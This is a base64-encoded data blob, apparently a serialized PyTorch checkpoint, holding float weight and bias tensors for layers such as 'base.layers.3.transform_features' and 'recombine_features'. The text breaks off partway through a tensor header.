Ty1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAcY6FcY9ScZBLAEtkS2SGcZFLZEsBhnGSiWgCKVJxk3RxlFJxlVgnAAAAYmFzZS5sYXllcnMuMy50cmFuc2Zvcm1fZ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